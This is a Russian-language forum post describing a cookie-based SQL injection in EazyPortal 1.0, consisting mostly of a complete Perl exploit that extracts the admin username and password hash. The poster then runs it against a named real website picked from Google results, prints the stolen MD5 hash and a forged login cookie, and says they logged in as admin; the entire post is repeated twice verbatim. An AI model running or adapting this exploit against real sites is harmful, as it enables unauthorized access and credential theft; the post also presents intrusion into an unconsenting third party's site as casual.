diehard
29.02.2008, 03:11
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных при использовании специально составленного cookie. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
#!/usr/bin/perl
#
# Vendor url: http://www.eazyportal.com/
#
# by Iron - http://www.randombase.com
#
# exploit goes through $_COOKIE
#
use LWP::UserAgent;
use MIME::Base64;
print "#
# EazyPortal <= 1.0 SQL Injection Exploit
# By Iron - www.randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/Portal/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "User id to retrieve name/password from? (1 = admin by default)";
chomp($target_id=<stdin>);
print "\n[+]Retrieving table prefix...";
@header = ('Cookie' => ' session_vars=YTo2OntzOjU6InVuYW1lIjtzOjEyOiInIEVSU k9SIFpPTUciO3M6NDoidXB3ZCI7czozMjoiMDk4ZjZiY2Q0NjI xZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiO3M6MzoidWlkIjtzOjE6I jEiO3M6NDoidWdtdCI7czoyOiIrMCI7czoxMDoidWxhc3R2aXN pdCI7czoxMDoiMTIwNDA0NjIwNiI7czo0OiJwcml2IjthOjk6e 3M6NDoibmV3cyI7czo0OiJuZXdzIjtzOjU6InBvbGxzIjtzOjI 6InBvIjtzOjc6Im1haWxpbmciO3M6MjoibWEiO3M6NToicGFnZ XMiO3M6MjoicGEiO3M6NToidXNlcnMiO3M6MjoidXMiO3M6ODo ic2V0dGluZ3MiO3M6Mjoic2UiO3M6NToiZm9ydW0iO3M6MjoiZ m8iO3M6NjoiYmxvY2tzIjtzOjI6ImJsIjtzOjg6ImRvd25sb2F kIjtzOjI6ImRvIjt9fQ==');
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
$response = $ua->get($target, @header);
if ($response->is_success)
{
#print $response->content;
if($response->content =~ /select \* from (.*)users where ustatus/i)
{
print "\n[+]Got prefix: $1";
$prefix = $1;
}
else
{
print "\n[-]Failed, trying empty prefix.";
$prefix = "";
}
}
else
{
die "Error: ".$response->status_line;
}
print "\n[+]Building cookie";
$query = "lalalalalala' UNION SELECT upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd, upwd,upwd,upwd,upwd,upwd FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; #fucked up query but it works :)
$cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd != \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}');
$cookie =~ s/\n//g;
$logincookie = $cookie;
print "\n[+]Eating cookie :P";
print "\n[+]Retrieving password";
@header = ('Cookie' => 'session_vars='.$cookie);
$response = $ua->get($target, @header);
if ($response->is_success)
{
if($response->content =~ /([a-f0-9]{32})/i)
{
$p = $1;
}
else
{
print "\n[-]Exploit failed :'(";
exit;
}
}
else
{
die "Error: ".$response->status_line;
}
print "\n[+]Retrieving username";
$query = "lalalalalala' UNION SELECT uname,uname,uname,uname,uname,uname,uname,uname,un ame,uname,uname,uname,uname,uname,uname FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id;
$cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd != \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}');
$cookie =~ s/\n//g;
@header = ('Cookie' => 'session_vars='.$cookie);
$response = $ua->get($target, @header);
if ($response->is_success)
{
if($response->content =~ />Log Out \((.*)\)<\/a>/i)
{
print "\n[+]Exploit succeeded!";
print "\n"."#" x 50 ."\n[+]Username: $1";
print "\n[+]Password: $p"."\n"."#" x 50;
}
else
{
print "\n[-]Exploit only got md5 pass :O";
print "\n[+]Password: $p";
}
# print "\n\n:[+]You can also login with this cookie:\n"."#" x 50 ."\n$logincookie\n"."#" x 50; #uncomment if you have troubles cracking the hash
}
else
{
die "Error: ".$response->status_line;
}
Тестим экслойт на первом попавшемся сайте из выдачи Гугла www.nekserve.de :
D:\Perl\bin>perl eazyport.pl
#
# EazyPortal <= 1.0 SQL Injection Exploit
# By Iron - www.randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/Portal/
Target url?www.nekserve.de/Portal/
User id to retrieve name/password from? (1 = admin by default)
[+]Retrieving table prefix...
[+]Got prefix: eapo_
[+]Building cookie
[+]Eating cookie :P
[+]Retrieving password
[+]Retrieving username
[-]Exploit only got md5 pass :O
[+]Password: 4d1b75b9df2cd64a269835ad756b6f9a
:[+]You can also login with this cookie:
##################################################
YTo2OntzOjU6InVuYW1lIjtzOjEzODoibGFsYWxhbGFsYWxhJy BVTklPTiBTRUxFQ1QgdXB3ZCx1cHdkLHVwd2QsdXB3ZCx1cHdk LHVwd2QsdXB3ZCx1cHdkLHVwd2Qs
dXB3ZCx1cHdkLHVwd2QsdXB3ZCx1cHdkLHVwd2QgRlJPTSBlYX BvX3VzZXJzIFdIRVJFIDE9MSBBTkQgdWlkID0nIjtzOjQ6InVw d2QiO3M6MTc6IicgT1IgdXB3ZCAh
PSAnbG9sIjtzOjM6InVpZCI7czoxOiIxIjtzOjQ6InVnbXQiO3 M6MjoiKzAiO3M6MTA6InVsYXN0dmlzaXQiO3M6MTA6IjEyMDQw NDYyMDYiO3M6NDoicHJpdiI7YTo5
OntzOjQ6Im5ld3MiO3M6NDoibmV3cyI7czo1OiJwb2xscyI7cz oyOiJwbyI7czo3OiJtYWlsaW5nIjtzOjI6Im1hIjtzOjU6InBh Z2VzIjtzOjI6InBhIjtzOjU6InVz
ZXJzIjtzOjI6InVzIjtzOjg6InNldHRpbmdzIjtzOjI6InNlIj tzOjU6ImZvcnVtIjtzOjI6ImZvIjtzOjY6ImJsb2NrcyI7czoy OiJibCI7czo4OiJkb3dubG9hZCI7
czoyOiJkbyI7fX0=
##################################################
Хеш расшифровать у меня не получилось, но подставив кукисы удалось зайти под админом
#!/usr/bin/perl
#
# Vendor url: http://www.eazyportal.com/
#
# by Iron - http://www.randombase.com
#
# exploit goes through $_COOKIE
#
use LWP::UserAgent;
use MIME::Base64;
print "#
# EazyPortal <= 1.0 SQL Injection Exploit
# By Iron - www.randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/Portal/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "User id to retrieve name/password from? (1 = admin by default)";
chomp($target_id=<stdin>);
print "\n[+]Retrieving table prefix...";
@header = ('Cookie' => ' session_vars=YTo2OntzOjU6InVuYW1lIjtzOjEyOiInIEVSU k9SIFpPTUciO3M6NDoidXB3ZCI7czozMjoiMDk4ZjZiY2Q0NjI xZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiO3M6MzoidWlkIjtzOjE6I jEiO3M6NDoidWdtdCI7czoyOiIrMCI7czoxMDoidWxhc3R2aXN pdCI7czoxMDoiMTIwNDA0NjIwNiI7czo0OiJwcml2IjthOjk6e 3M6NDoibmV3cyI7czo0OiJuZXdzIjtzOjU6InBvbGxzIjtzOjI 6InBvIjtzOjc6Im1haWxpbmciO3M6MjoibWEiO3M6NToicGFnZ XMiO3M6MjoicGEiO3M6NToidXNlcnMiO3M6MjoidXMiO3M6ODo ic2V0dGluZ3MiO3M6Mjoic2UiO3M6NToiZm9ydW0iO3M6MjoiZ m8iO3M6NjoiYmxvY2tzIjtzOjI6ImJsIjtzOjg6ImRvd25sb2F kIjtzOjI6ImRvIjt9fQ==');
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
$response = $ua->get($target, @header);
if ($response->is_success)
{
#print $response->content;
if($response->content =~ /select \* from (.*)users where ustatus/i)
{
print "\n[+]Got prefix: $1";
$prefix = $1;
}
else
{
print "\n[-]Failed, trying empty prefix.";
$prefix = "";
}
}
else
{
die "Error: ".$response->status_line;
}
print "\n[+]Building cookie";
$query = "lalalalalala' UNION SELECT upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd, upwd,upwd,upwd,upwd,upwd FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; #fucked up query but it works :)
$cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd != \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}');
$cookie =~ s/\n//g;
$logincookie = $cookie;
print "\n[+]Eating cookie :P";
print "\n[+]Retrieving password";
@header = ('Cookie' => 'session_vars='.$cookie);
$response = $ua->get($target, @header);
if ($response->is_success)
{
if($response->content =~ /([a-f0-9]{32})/i)
{
$p = $1;
}
else
{
print "\n[-]Exploit failed :'(";
exit;
}
}
else
{
die "Error: ".$response->status_line;
}
print "\n[+]Retrieving username";
$query = "lalalalalala' UNION SELECT uname,uname,uname,uname,uname,uname,uname,uname,un ame,uname,uname,uname,uname,uname,uname FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id;
$cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd != \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}');
$cookie =~ s/\n//g;
@header = ('Cookie' => 'session_vars='.$cookie);
$response = $ua->get($target, @header);
if ($response->is_success)
{
if($response->content =~ />Log Out \((.*)\)<\/a>/i)
{
print "\n[+]Exploit succeeded!";
print "\n"."#" x 50 ."\n[+]Username: $1";
print "\n[+]Password: $p"."\n"."#" x 50;
}
else
{
print "\n[-]Exploit only got md5 pass :O";
print "\n[+]Password: $p";
}
# print "\n\n:[+]You can also login with this cookie:\n"."#" x 50 ."\n$logincookie\n"."#" x 50; #uncomment if you have troubles cracking the hash
}
else
{
die "Error: ".$response->status_line;
}
Тестим экслойт на первом попавшемся сайте из выдачи Гугла www.nekserve.de :
D:\Perl\bin>perl eazyport.pl
#
# EazyPortal <= 1.0 SQL Injection Exploit
# By Iron - www.randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/Portal/
Target url?www.nekserve.de/Portal/
User id to retrieve name/password from? (1 = admin by default)
[+]Retrieving table prefix...
[+]Got prefix: eapo_
[+]Building cookie
[+]Eating cookie :P
[+]Retrieving password
[+]Retrieving username
[-]Exploit only got md5 pass :O
[+]Password: 4d1b75b9df2cd64a269835ad756b6f9a
:[+]You can also login with this cookie:
##################################################
YTo2OntzOjU6InVuYW1lIjtzOjEzODoibGFsYWxhbGFsYWxhJy BVTklPTiBTRUxFQ1QgdXB3ZCx1cHdkLHVwd2QsdXB3ZCx1cHdk LHVwd2QsdXB3ZCx1cHdkLHVwd2Qs
dXB3ZCx1cHdkLHVwd2QsdXB3ZCx1cHdkLHVwd2QgRlJPTSBlYX BvX3VzZXJzIFdIRVJFIDE9MSBBTkQgdWlkID0nIjtzOjQ6InVw d2QiO3M6MTc6IicgT1IgdXB3ZCAh
PSAnbG9sIjtzOjM6InVpZCI7czoxOiIxIjtzOjQ6InVnbXQiO3 M6MjoiKzAiO3M6MTA6InVsYXN0dmlzaXQiO3M6MTA6IjEyMDQw NDYyMDYiO3M6NDoicHJpdiI7YTo5
OntzOjQ6Im5ld3MiO3M6NDoibmV3cyI7czo1OiJwb2xscyI7cz oyOiJwbyI7czo3OiJtYWlsaW5nIjtzOjI6Im1hIjtzOjU6InBh Z2VzIjtzOjI6InBhIjtzOjU6InVz
ZXJzIjtzOjI6InVzIjtzOjg6InNldHRpbmdzIjtzOjI6InNlIj tzOjU6ImZvcnVtIjtzOjI6ImZvIjtzOjY6ImJsb2NrcyI7czoy OiJibCI7czo4OiJkb3dubG9hZCI7
czoyOiJkbyI7fX0=
##################################################
Хеш расшифровать у меня не получилось, но подставив кукисы удалось зайти под админом